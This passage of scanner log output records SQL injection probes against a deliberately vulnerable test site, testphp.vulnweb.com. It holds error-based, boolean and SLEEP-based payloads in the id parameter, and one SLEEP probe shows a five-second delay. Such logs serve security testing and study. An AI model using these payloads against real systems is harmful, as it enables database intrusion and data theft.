\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":2,\"lines\":2,\"status_code\":200,\"content_length\":47,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:22:28.305466486Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/details.php?id=-1%20OR%2017-7%3D10%20AND%20EXTRACTVALUE%285486%2CCONCAT%280x5c%2C0x7176627671%2C%28SELECT%20%28ELT%285486%3D5486%2C1%29%29%29%2C0x716a627a71%29%29\",\"input\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/details.php?id=-1%20OR%2017-7%3D10%20AND%20EXTRACTVALUE%285486%2CCONCAT%280x5c%2C0x7176627671%2C%28SELECT%20%28ELT%285486%3D5486%2C1%29%29%29%2C0x716a627a71%29%29\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/Mod_Rewrite_Shop/details.php?id=-1%20OR%2017-7%3D10%20AND%20EXTRACTVALUE%285486%2CCONCAT%280x5c%2C0x7176627671%2C%28SELECT%20%28ELT%285486%3D5486%2C1%29%29%29%2C0x716a627a71%29%29\",\"time\":\"352.052112ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":16,\"lines\":4,\"status_code\":200,\"content_length\":181,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:22:28.392521469Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/details.php?id=-1%20OR%2017-7%3D10%20AND%20GTID_SUBSET%28CONCAT%280x7176627671%2C%28SELECT%20%28ELT%287146%3D7146%2C1%29%29%29%2C0x716a627a71%29%2C7146%29\",\"input\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/details.php?id=-1%20OR%2017-7%3D10%20AND%20GTID_SUBSET%28CONCAT%280x7176627671%2C%28SELECT%20%28ELT%287146%3D7146%2C1%29%29%29%2C0x716a627a71%29%2C7146%29\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/Mod_Rewrite_Shop/details.php?id=-1%20OR%2017-7%3D10%20AND%20GTID_SUBSET%28CONCAT%280x7176627671%2C%28SELECT%20%28ELT%287146%3D7146%2C1%29%29%29%2C0x716a627a71%29%2C7146%29\",\"time\":\"340.164331ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":16,\"lines\":4,\"status_code\":200,\"content_length\":181,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:22:28.551480227Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/details.php?id=-1%20OR%2017-7%3D10%20AND%20JSON_KEYS%28%28SELECT%20CONVERT%28%28SELECT%20CONCAT%280x7176627671%2C%28SELECT%20%28ELT%285747%3D5747%2C1%29%29%29%2C0x716a627a71%29%29%20USING%20utf8%29%29%29\",\"input\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/details.php?id=-1%20OR%2017-7%3D10%20AND%20JSON_KEYS%28%28SELECT%20CONVERT%28%28SELECT%20CONCAT%280x7176627671%2C%28SELECT%20%28ELT%285747%3D5747%2C1%29%29%29%2C0x716a627a71%29%29%20USING%20utf8%29%29%29\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/Mod_Rewrite_Shop/details.php?id=-1%20OR%2017-7%3D10%20AND%20JSON_KEYS%28%28SELECT%20CONVERT%28%28SELECT%20CONCAT%280x7176627671%2C%28SELECT%20%28ELT%285747%3D5747%2C1%29%29%29%2C0x716a627a71%29%29%20USING%20utf8%29%29%29\",\"time\":\"356.013543ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":16,\"lines\":4,\"status_code\":200,\"content_length\":181,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:22:28.638382405Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/details.php?id=-1%20OR%2017-7%3D10%20AND%20ROW%282749%2C8341%29%3E%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x7176627671%2C%28SELECT%20%28ELT%282749%3D2749%2C1%29%29%29%2C0x716a627a71%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20%28SELECT%201384%20UNION%20SELECT%201974%20UNION%20SELECT%206255%20UNION%20SELECT%206029%29a%20GROUP%20BY%20x%29\",\"input\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/details.php?id=-1%20OR%2017-7%3D10%20AND%20ROW%282749%2C8341%29%3E%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x7176627671%2C%28SELECT%20%28ELT%282749%3D2749%2C1%29%29%29%2C0x716a627a71%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20%28SELECT%201384%20UNION%20SELECT%201974%20UNION%20SELECT%206255%20UNION%20SELECT%206029%29a%20GROUP%20BY%20x%29\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/Mod_Rewrite_Shop/details.php?id=-1%20OR%2017-7%3D10%20AND%20ROW%282749%2C8341%29%3E%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x7176627671%2C%28SELECT%20%28ELT%282749%3D2749%2C1%29%29%29%2C0x716a627a71%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20%28SELECT%201384%20UNION%20SELECT%201974%20UNION%20SELECT%206255%20UNION%20SELECT%206029%29a%20GROUP%20BY%20x%29\",\"time\":\"362.416566ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":27,\"lines\":6,\"status_code\":200,\"content_length\":286,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:22:28.718164651Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/details.php?id=-1%20OR%2017-7%3D10%20AND%20UPDATEXML%284861%2CCONCAT%280x2e%2C0x7176627671%2C%28SELECT%20%28ELT%284861%3D4861%2C1%29%29%29%2C0x716a627a71%29%2C4144%29\",\"input\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/details.php?id=-1%20OR%2017-7%3D10%20AND%20UPDATEXML%284861%2CCONCAT%280x2e%2C0x7176627671%2C%28SELECT%20%28ELT%284861%3D4861%2C1%29%29%29%2C0x716a627a71%29%2C4144%29\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/Mod_Rewrite_Shop/details.php?id=-1%20OR%2017-7%3D10%20AND%20UPDATEXML%284861%2CCONCAT%280x2e%2C0x7176627671%2C%28SELECT%20%28ELT%284861%3D4861%2C1%29%29%29%2C0x716a627a71%29%2C4144%29\",\"time\":\"357.04915ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":16,\"lines\":4,\"status_code\":200,\"content_length\":181,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:22:28.735436627Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/details.php?id=-1%20OR%2017-7%3D10%20OR%20%28SELECT%204373%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x7176627671%2C%28SELECT%20%28ELT%284373%3D4373%2C1%29%29%29%2C0x716a627a71%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.PLUGINS%20GROUP%20BY%20x%29a%29\",\"input\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/details.php?id=-1%20OR%2017-7%3D10%20OR%20%28SELECT%204373%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x7176627671%2C%28SELECT%20%28ELT%284373%3D4373%2C1%29%29%29%2C0x716a627a71%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.PLUGINS%20GROUP%20BY%20x%29a%29\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/Mod_Rewrite_Shop/details.php?id=-1%20OR%2017-7%3D10%20OR%20%28SELECT%204373%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x7176627671%2C%28SELECT%20%28ELT%284373%3D4373%2C1%29%29%29%2C0x716a627a71%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.PLUGINS%20GROUP%20BY%20x%29a%29\",\"time\":\"354.730152ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":17,\"lines\":2,\"status_code\":200,\"content_length\":319,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:22:28.796698003Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/details.php?id=-1%20OR%2017-7%3D10%20OR%20%28SELECT%206300%20FROM%20%28SELECT%28SLEEP%285%29%29%29saXG%29\",\"input\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/details.php?id=-1%20OR%2017-7%3D10%20OR%20%28SELECT%206300%20FROM%20%28SELECT%28SLEEP%285%29%29%29saXG%29\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/Mod_Rewrite_Shop/details.php?id=-1%20OR%2017-7%3D10%20OR%20%28SELECT%206300%20FROM%20%28SELECT%28SLEEP%285%29%29%29saXG%29\",\"time\":\"349.801691ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":17,\"lines\":2,\"status_code\":200,\"content_length\":319,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:22:28.856375066Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/details.php?id=-1%20OR%2017-7%3D10%20OR%20EXTRACTVALUE%282072%2CCONCAT%280x5c%2C0x7176627671%2C%28SELECT%20%28ELT%282072%3D2072%2C1%29%29%29%2C0x716a627a71%29%29\",\"input\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/details.php?id=-1%20OR%2017-7%3D10%20OR%20EXTRACTVALUE%282072%2CCONCAT%280x5c%2C0x7176627671%2C%28SELECT%20%28ELT%282072%3D2072%2C1%29%29%29%2C0x716a627a71%29%29\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/Mod_Rewrite_Shop/details.php?id=-1%20OR%2017-7%3D10%20OR%20EXTRACTVALUE%282072%2CCONCAT%280x5c%2C0x7176627671%2C%28SELECT%20%28ELT%282072%3D2072%2C1%29%29%29%2C0x716a627a71%29%29\",\"time\":\"349.456149ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":16,\"lines\":4,\"status_code\":200,\"content_length\":181,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:22:29.027025419Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/details.php?id=-1%20OR%2017-7%3D10%20OR%20GTID_SUBSET%28CONCAT%280x7176627671%2C%28SELECT%20%28ELT%281915%3D1915%2C1%29%29%29%2C0x716a627a71%29%2C1915%29\",\"input\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/details.php?id=-1%20OR%2017-7%3D10%20OR%20GTID_SUBSET%28CONCAT%280x7176627671%2C%28SELECT%20%28ELT%281915%3D1915%2C1%29%29%29%2C0x716a627a71%29%2C1915%29\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/Mod_Rewrite_Shop/details.php?id=-1%20OR%2017-7%3D10%20OR%20GTID_SUBSET%28CONCAT%280x7176627671%2C%28SELECT%20%28ELT%281915%3D1915%2C1%29%29%29%2C0x716a627a71%29%2C1915%29\",\"time\":\"352.325474ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":17,\"lines\":2,\"status_code\":200,\"content_length\":319,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:22:29.094702452Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/details.php?id=-1%20OR%2017-7%3D10%20OR%20SLEEP%285%29%23\",\"input\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/details.php?id=-1%20OR%2017-7%3D10%20OR%20SLEEP%285%29%23\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/Mod_Rewrite_Shop/details.php?id=-1%20OR%2017-7%3D10%20OR%20SLEEP%285%29%23\",\"time\":\"344.981013ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":17,\"lines\":2,\"status_code\":200,\"content_length\":319,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:22:29.10316141Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/details.php?id=-1%20OR%2017-7%3D10%20OR%20UPDATEXML%281045%2CCONCAT%280x2e%2C0x7176627671%2C%28SELECT%20%28ELT%281045%3D1045%2C1%29%29%29%2C0x716a627a71%29%2C1018%29\",\"input\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/details.php?id=-1%20OR%2017-7%3D10%20OR%20UPDATEXML%281045%2CCONCAT%280x2e%2C0x7176627671%2C%28SELECT%20%28ELT%281045%3D1045%2C1%29%29%29%2C0x716a627a71%29%2C1018%29\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/Mod_Rewrite_Shop/details.php?id=-1%20OR%2017-7%3D10%20OR%20UPDATEXML%281045%2CCONCAT%280x2e%2C0x7176627671%2C%28SELECT%20%28ELT%281045%3D1045%2C1%29%29%29%2C0x716a627a71%29%2C1018%29\",\"time\":\"353.418224ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":16,\"lines\":4,\"status_code\":200,\"content_length\":181,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:22:29.152218172Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/details.php?id=-1%20OR%2017-7%3D10%20PROCEDURE%20ANALYSE%28EXTRACTVALUE%286706%2CCONCAT%280x5c%2C0x7176627671%2C%28SELECT%20%28CASE%20WHEN%20%286706%3D6706%29%20THEN%201%20ELSE%200%20END%29%29%2C0x716a627a71%29%29%2C1%29\",\"input\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/details.php?id=-1%20OR%2017-7%3D10%20PROCEDURE%20ANALYSE%28EXTRACTVALUE%286706%2CCONCAT%280x5c%2C0x7176627671%2C%28SELECT%20%28CASE%20WHEN%20%286706%3D6706%29%20THEN%201%20ELSE%200%20END%29%29%2C0x716a627a71%29%29%2C1%29\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/Mod_Rewrite_Shop/details.php?id=-1%20OR%2017-7%3D10%20PROCEDURE%20ANALYSE%28EXTRACTVALUE%286706%2CCONCAT%280x5c%2C0x7176627671%2C%28SELECT%20%28CASE%20WHEN%20%286706%3D6706%29%20THEN%201%20ELSE%200%20END%29%29%2C0x716a627a71%29%29%2C1%29\",\"time\":\"358.242027ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":16,\"lines\":4,\"status_code\":200,\"content_length\":181,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:22:29.327999069Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/details.php?id=-1%20OR%2017-7%3D10%22%20AND%203298%3D3298%23\",\"input\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/details.php?id=-1%20OR%2017-7%3D10%22%20AND%203298%3D3298%23\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/Mod_Rewrite_Shop/details.php?id=-1%20OR%2017-7%3D10%22%20AND%203298%3D3298%23\",\"time\":\"351.779155ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":16,\"lines\":4,\"status_code\":200,\"content_length\":181,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:22:32.598899161Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/details.php?id=-1%20OR%2017-7%3D10%22%29%27.%2C.%29%29.%28\",\"input\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/details.php?id=-1%20OR%2017-7%3D10%22%29%27.%2C.%29%29.%28\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/Mod_Rewrite_Shop/details.php?id=-1%20OR%2017-7%3D10%22%29%27.%2C.%29%29.%28\",\"time\":\"345.322434ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":16,\"lines\":4,\"status_code\":200,\"content_length\":181,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:22:32.699876869Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/details.php?id=-1%20OR%2017-7%3D10%27%20AND%205588%3D4753%23\",\"input\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/details.php?id=-1%20OR%2017-7%3D10%27%20AND%205588%3D4753%23\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/Mod_Rewrite_Shop/details.php?id=-1%20OR%2017-7%3D10%27%20AND%205588%3D4753%23\",\"time\":\"357.400386ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":16,\"lines\":4,\"status_code\":200,\"content_length\":181,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:22:32.771464378Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/details.php?id=-1%20OR%2017-7%3D10%27%29%20AND%203298%3D3298%23\",\"input\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/details.php?id=-1%20OR%2017-7%3D10%27%29%20AND%203298%3D3298%23\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/Mod_Rewrite_Shop/details.php?id=-1%20OR%2017-7%3D10%27%29%20AND%203298%3D3298%23\",\"time\":\"343.426167ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":16,\"lines\":4,\"status_code\":200,\"content_length\":181,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:22:32.822760033Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/details.php?id=-1%20OR%2017-7%3D10%27TjukDj%3C%27%22%3EHieVNc\",\"input\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/details.php?id=-1%20OR%2017-7%3D10%27TjukDj%3C%27%22%3EHieVNc\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/Mod_Rewrite_Shop/details.php?id=-1%20OR%2017-7%3D10%27TjukDj%3C%27%22%3EHieVNc\",\"time\":\"353.222742ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":16,\"lines\":4,\"status_code\":200,\"content_length\":181,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:22:33.191452654Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/details.php?id=-1%20OR%2017-7%3D10%20AND%20%28SELECT%206105%20FROM%20%28SELECT%28SLEEP%285%29%29%29prWg%29\",\"input\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/details.php?id=-1%20OR%2017-7%3D10%20AND%20%28SELECT%206105%20FROM%20%28SELECT%28SLEEP%285%29%29%29prWg%29\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/Mod_Rewrite_Shop/details.php?id=-1%20OR%2017-7%3D10%20AND%20%28SELECT%206105%20FROM%20%28SELECT%28SLEEP%285%29%29%29prWg%29\",\"time\":\"5.370399348s\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":17,\"lines\":2,\"status_code\":200,\"content_length\":319,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:22:33.548368531Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/details.php?id=-1%20OR%2017-7%3D10%29%20AND%201942%3D8766%23\",\"input\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/details.php?id=-1%20OR%2017-7%3D10%29%20AND%201942%3D8766%23\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/Mod_Rewrite_Shop/details.php?id=-1%20OR%2017-7%3D10%29%20AND%201942%3D8766%23\",\"time\":\"352.279256ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":16,\"lines\":4,\"status_code\":200,\"content_length\":181,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:22:33.548472503Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/details.php?id=-1%20OR%2017-7%3D10%29%20AND%201589%3D1589%20AND%20%283032%3D3032\",\"input\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/details.php?id=-1%20OR%2017-7%3D10%29%20AND%201589%3D1589%20AND%20%283032%3D3032\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/Mod_Rewrite_Shop/details.php?id=-1%20OR%2017-7%3D10%29%20AND%201589%3D1589%20AND%20%283032%3D3032\",\"time\":\"356.892895ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":16,\"lines\":4,\"status_code\":200,\"content_length\":181,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:22:33.806914051Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/details.php?id=-1%20OR%2017-7%3D10%29%20AND%208841%3D3144%20AND%20%283992%3D3992\",\"input\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/details.php?id=-1%20OR%2017-7%3D10%29%20AND%208841%3D3144%20AND%20%283992%3D3992\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/Mod_Rewrite_Shop/details.php?id=-1%20OR%2017-7%3D10%29%20AND%208841%3D3144%20AND%20%283992%3D3992\",\"time\":\"353.333683ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":16,\"lines\":4,\"status_code\":200,\"content_length\":181,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:22:34.305073578Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/details.php?id=-1%20OR%2017-7%3D10%29%29%20AND%203298%3D3298%23\",\"input\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/details.php?id=-1%20OR%2017-7%3D10%29%29%20AND%203298%3D3298%23\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/Mod_Rewrite_Shop/details.php?id=-1%20OR%2017-7%3D10%29%29%20AND%203298%3D3298%23\",\"time\":\"353.221489ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":16,\"lines\":4,\"status_code\":200,\"content_length\":181,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:22:34.431763093Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/details.php?id=-1%20OR%2017-7%3D10%29%29%20AND%207843%3D8193%23\",\"input\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/details.php?id=-1%20OR%2017-7%3D10%29%29%20AND%207843%3D8193%23\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/Mod_Rewrite_Shop/details.php?id=-1%20OR%2017-7%3D10%29%29%20AND%207843%3D8193%23\",\"time\":\"342.767927ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":16,\"lines\":4,\"status_code\":200,\"content_length\":181,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:22:37.52415233Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/details.php?id=-1%20OR%2017-7%3D10%3B%28SELECT%20%2A%20FROM%20%28SELECT%28SLEEP%285%29%29%29tTqe%29\",\"input\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/details.php?id=-1%20OR%2017-7%3D10%3B%28SELECT%20%2A%20FROM%20%28SELECT%28SLEEP%285%29%29%29tTqe%29\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/Mod_Rewrite_Shop/details.php?id=-1%20OR%2017-7%3D10%3B%28SELECT%20%2A%20FROM%20%28SELECT%28SLEEP%285%29%29%29tTqe%29\",\"time\":\"347.227043ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":16,\"lines\":4,\"status_code\":200,\"content_length\":181,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T